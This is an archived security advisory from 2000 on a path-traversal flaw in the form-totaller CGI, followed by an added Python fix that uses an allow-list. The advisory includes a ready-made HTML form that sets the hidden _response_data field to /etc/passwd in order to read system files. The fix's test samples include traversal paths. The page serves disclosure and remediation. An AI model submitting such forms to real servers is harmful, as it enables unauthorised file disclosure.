
form-totaller.txt

14 Aug 2000 00:00:00 | Reported by Signal 9 | Type: packetstorm | Source: packetstormsecurity.com

Vulnerable form-totaller CGI allows remote file access via insecure response data field.

Code
`Content-Type: Remote Root via vulnerable CGI software  
Date : 13/08/2000  
Sender : s1gnal_9 <[email protected]>  
Subject : form-totaller Vulnerable CGI  
X-System : UNIX/NT systems running the form-totaller CGI software  
X-Status : s1gnal_9-ADVISORY-form-totaller.txt  
X-Greets : Narr0w, f0bic, VetesGirl  
_________________________________________________________________________________  
  
  
PRODUCT NAME: form-totaller version 1.0  
  
PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/  
Also Available at freecode.com   
  
DESCRIPTION :   
Use "form-totaller" to create tests and quizzes on the web.   
Use forms with pull-down menus or radio buttons and this CGI will display   
output based on their input.   
  
PROBLEM:  
The command field "_response_data" is the field that specifies the display output   
based on their input.   
  
The default file for this field is set at:  
<input type="hidden" name="_response_data" value="responses.dat">  
A remote attacker could easily change the cgi script to use "/etc/passwd" as the   
response data value.   
  
  
EXAMPLE:  
Below is an example of how we could read files on the remote system.  
  
<-------------------------CUT HERE-------------------------------------->  
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">  
<input type="hidden" name="_response_top" value="top.html">  
<input type="hidden" name="_response_data" value="/etc/passwd">  
<input type="hidden" name="_response_bottom" value="bottom.html">  
<input type="hidden" name="_divide_by" value="4">  
<input type="submit" value="Click for viewing of the /etc/passwd file.">  
</form>  
<-------------------------CUT HERE-------------------------------------->  
  
  
SOLUTION  
I would recommend hard-coding the response_data file right into the script   
and leaving that command field out of the CGI.  
  
  
Please visit www.zone.ee/unix :)  
  
`
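
The fix recommended under SOLUTION, as an added example that is not part of the original advisory or of the form-totaller code: the script accepts `_response_data` only from a server-side allow-list (a one-entry list is the hard-coded case) and confirms the resolved path stays inside the response directory. Python is used for illustration; the function name, exception class, directory layout and sample values are assumptions.

```python
import os
import tempfile

# Assumption: all response files live in one directory owned by the site operator.
ALLOWED_RESPONSE_FILES = {"responses.dat"}  # default name shown in the advisory
DEFAULT_RESPONSE_FILE = "responses.dat"
# Constructed sample field values, including the one from the advisory's form.
SAMPLES = ["responses.dat", "", "/etc/passwd", "../../etc/passwd"]


class RejectedField(ValueError):
    """Raised when a client-supplied file field is not acceptable."""


def resolve_response_data(field_value, base_dir, allowed=ALLOWED_RESPONSE_FILES):
    """Map the client-controlled _response_data value to a file under base_dir."""
    name = field_value or DEFAULT_RESPONSE_FILE
    # 1. Allow-list: only names configured on the server are accepted.
    if name not in allowed:
        raise RejectedField("not an allowed response file: %r" % name)
    # 2. Defence in depth: after resolving symlinks, stay inside base_dir.
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, path]) != base:
        raise RejectedField("path escapes response directory: %r" % name)
    return path


def demo():
    """Run the constructed samples through the check; return {value: outcome}."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "responses.dat"), "w") as fh:
            fh.write("constructed sample data\n")
        for value in SAMPLES:
            try:
                resolve_response_data(value, base)
                results[value] = "accepted"
            except RejectedField:
                results[value] = "rejected"
    return results


if __name__ == "__main__":
    for value, outcome in demo().items():
        print("%-22r %s" % (value, outcome))
```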
